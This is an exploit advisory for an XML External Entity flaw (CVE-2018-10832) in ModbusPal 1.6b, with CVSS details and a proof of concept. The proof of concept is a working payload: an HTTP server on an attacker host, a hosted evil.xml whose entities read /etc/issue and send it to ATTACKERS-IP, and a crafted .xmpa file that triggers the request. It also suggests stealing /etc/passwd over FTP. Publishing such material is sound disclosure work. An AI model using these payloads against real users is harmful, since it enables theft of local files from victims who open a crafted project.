ModbusPal 1.6b XML External Entity Injection

Credit: Trent Gordon
Risk: High
Local: No
Remote: Yes
CWE: CWE-611

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

[+] Exploit Title: ModbusPal XXE Injection [+] Date: 05-08-2018 [+] Exploit Author: Trent Gordon [+] Vendor Homepage: [+] Software Link: [+] Version: 1.6b [+] Tested on: Ubuntu 16.04 with Java 1.8.0_151 [+] CVE: CVE-2018-10832 1. Vulnerability Description ModbusPal 1.6b is vulnerable to an XML External Entity (XXE) attack. Projects are saved as .xmpp files and automations can be exported as .xmpa files, both XML-based and vulnerable to XXE injection. Sending a crafted .xmpp or .xmpa file to a user, when opened/imported in ModbusPal 1.6b, will return the contents of any local files to a remote attacker. 2. Proof of Concept a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting evil.xml) b.) Contents of hosted "evil.xml" <!ENTITY % data SYSTEM "file:///etc/issue"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://ATTACKERS-IP:9999/?%data;'>"> c.) Example Exploited "xxe.xmpa" <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/evil.xml"> %sp; %param1; ]> <r>&exfil;</r> <!DOCTYPE modbuspal_automation SYSTEM "modbuspal.dtd"> <modbuspal_automation> <automation name="temp" step="1.0" loop="true" init="0.0"> </automation> </modbuspal_automation> 3. Additional Details Java 1.7 contains certain defenses against XXE, including throwing a when certain characters (such as '/n') are included in a URL. This means that the file exfiltrated in the above attack is limited to single line files that dont contain any restricted characters. The above POC uses /etc/issue, which is one of the few common linux files that meets this criteria. Exploitation of this vulnerability on later versions of Java requires a more creative approach than described above, such as using FTP instead of URL to exfiltrate /etc/passwd.

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018,


Back to Top